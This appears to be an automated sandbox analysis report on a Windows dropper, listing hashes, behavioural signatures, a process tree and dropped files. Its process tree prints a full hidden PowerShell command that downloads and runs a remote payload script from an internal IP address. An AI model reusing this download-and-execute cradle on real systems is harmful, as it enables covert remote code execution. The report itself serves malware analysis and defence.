Analysis
-
max time kernel
96s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe
Resource
win7-20240903-en
General
-
Target
b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe
-
Size
465KB
-
MD5
18f89dc05d67aae003c7f8b2b60394d6
-
SHA1
5844e2aff3d3ad18bef6d132e94298aba2e59dbc
-
SHA256
b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af
-
SHA512
e02d3a702acec75118b5244a40b2bf53c5f4be09251251093e75547332e7fa942abaac7b18d427b8decc1c624db34c41dbf07446aedde8ef1fbe0c147a681497
-
SSDEEP
12288:DCQjgAtAHM+vetZxF5EWry8AJGy0VMgEi:D5ZWs+OZVEWry8AFqEi
Malware Config
Extracted
http://192.168.221.129:44/download/payloadx86_.ps1
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2636 powershell.exe 2884 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2884 powershell.exe 2636 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2208 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2208 AcroRd32.exe 2208 AcroRd32.exe 2208 AcroRd32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2208 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 29 PID 2592 wrote to memory of 2208 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 29 PID 2592 wrote to memory of 2208 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 29 PID 2592 wrote to memory of 2208 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 29 PID 2592 wrote to memory of 2740 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 30 PID 2592 wrote to memory of 2740 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 30 PID 2592 wrote to memory of 2740 2592 b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe 30 PID 2740 wrote to memory of 2976 2740 WScript.exe 31 PID 2740 wrote to memory of 2976 2740 WScript.exe 31 PID 2740 wrote to memory of 2976 2740 WScript.exe 31 PID 2976 wrote to memory of 2884 2976 cmd.exe 33 PID 2976 wrote to memory of 2884 2976 cmd.exe 33 PID 2976 wrote to memory of 2884 2976 cmd.exe 33 PID 2884 wrote to memory of 2636 2884 powershell.exe 34 PID 2884 wrote to memory of 2636 2884 powershell.exe 34 PID 2884 wrote to memory of 2636 2884 powershell.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe"C:\Users\Admin\AppData\Local\Temp\b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\test.pdf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\shell.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C START /B C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -file C:\Users\Admin\AppData\Local\Temp\shell.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -file C:\Users\Admin\AppData\Local\Temp\shell.ps14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -nop -w hidden -noe -c "IEX ((new-object net.webclient).downloadstring('http://192.168.221.129:44/download/payloadx86_.ps1'))"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5da4f7cc01b0879c04f5f9a5c3c8676e8
SHA165bc3cb548b0617c24950d80e8947f3677a790ed
SHA2564203915a7e288bbb621bf9a0120c13cd7d63b7c94692c148e694b4c72479f5de
SHA512aba7dca197f61a7049f23165bfacadf291a7e7fc8d9140124244e72964fa9d9f8343c75456e79dee2e20c9635f14a8f12220a40700f1f253bdb85f69ffe516ef
-
Filesize
254B
MD573cce9205d9b2c0ef64960c9a49502d1
SHA1b4a7a307225278b714e24c35d9c63e883559b70e
SHA256f85f46d341680019be082290131fa563528788083046dfd8a902cd6b5362c3b0
SHA5124270fe3912503f775c451472f4f06509349e78b96f83085287ac4a13e80d032b9605c5a592205bf0873dd0860daf798c75ea9c7b2fd15219b919feb96c64fca2
-
Filesize
21KB
MD5a7c53fff793492363a45a36531c1da27
SHA1126b6f1a12ed08866db2d7dc3cdee8ccf3c19b2b
SHA25696b36e14df5655dccedd37efdbffb36d78838719dcd025f1496d43accfcb017c
SHA512a3657cc40d70bb88d7aa9b5a254b13462ea5e28f7373c5cb1c0f007c22a70fe4e79ae7223191b9a009cb09994afd98021fe3ff7fc407b38ad170203ed853b735
-
Filesize
3KB
MD5521d672949111d2580bc39a2928ea49d
SHA180eaed46ae537ac0c7eb4b2a7ac2e8712cf2770f
SHA25671cd979496d24ea737b94e6e9bec1ef89f40ea9cc31a4f90fe6f06a9deeb63c6
SHA512dd51ab354830af5f37d45b739f89eb0a7712382d9ea42c41bd9fa290e34f38c10c223d454c295f30052bd5d2b5a30a38abb7968ca9a68a26819f07e7b6b32e1b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a130c11e8b394accb066468556b67408
SHA1a3a6f45980ddf0c7f630a040989ce79296504a24
SHA256c1ae473d924922b591fef2eb9f8f32effcf4c4d6baa6e8c95168fd78c14e5516
SHA5125a052376913ca617a7851738573ce3c03eed44c0e098a66175bba74434d0cfcc8401169a8d3282bdb7f105fc56d4c8c3bfa20b24d791ae028deb8c62f61351b8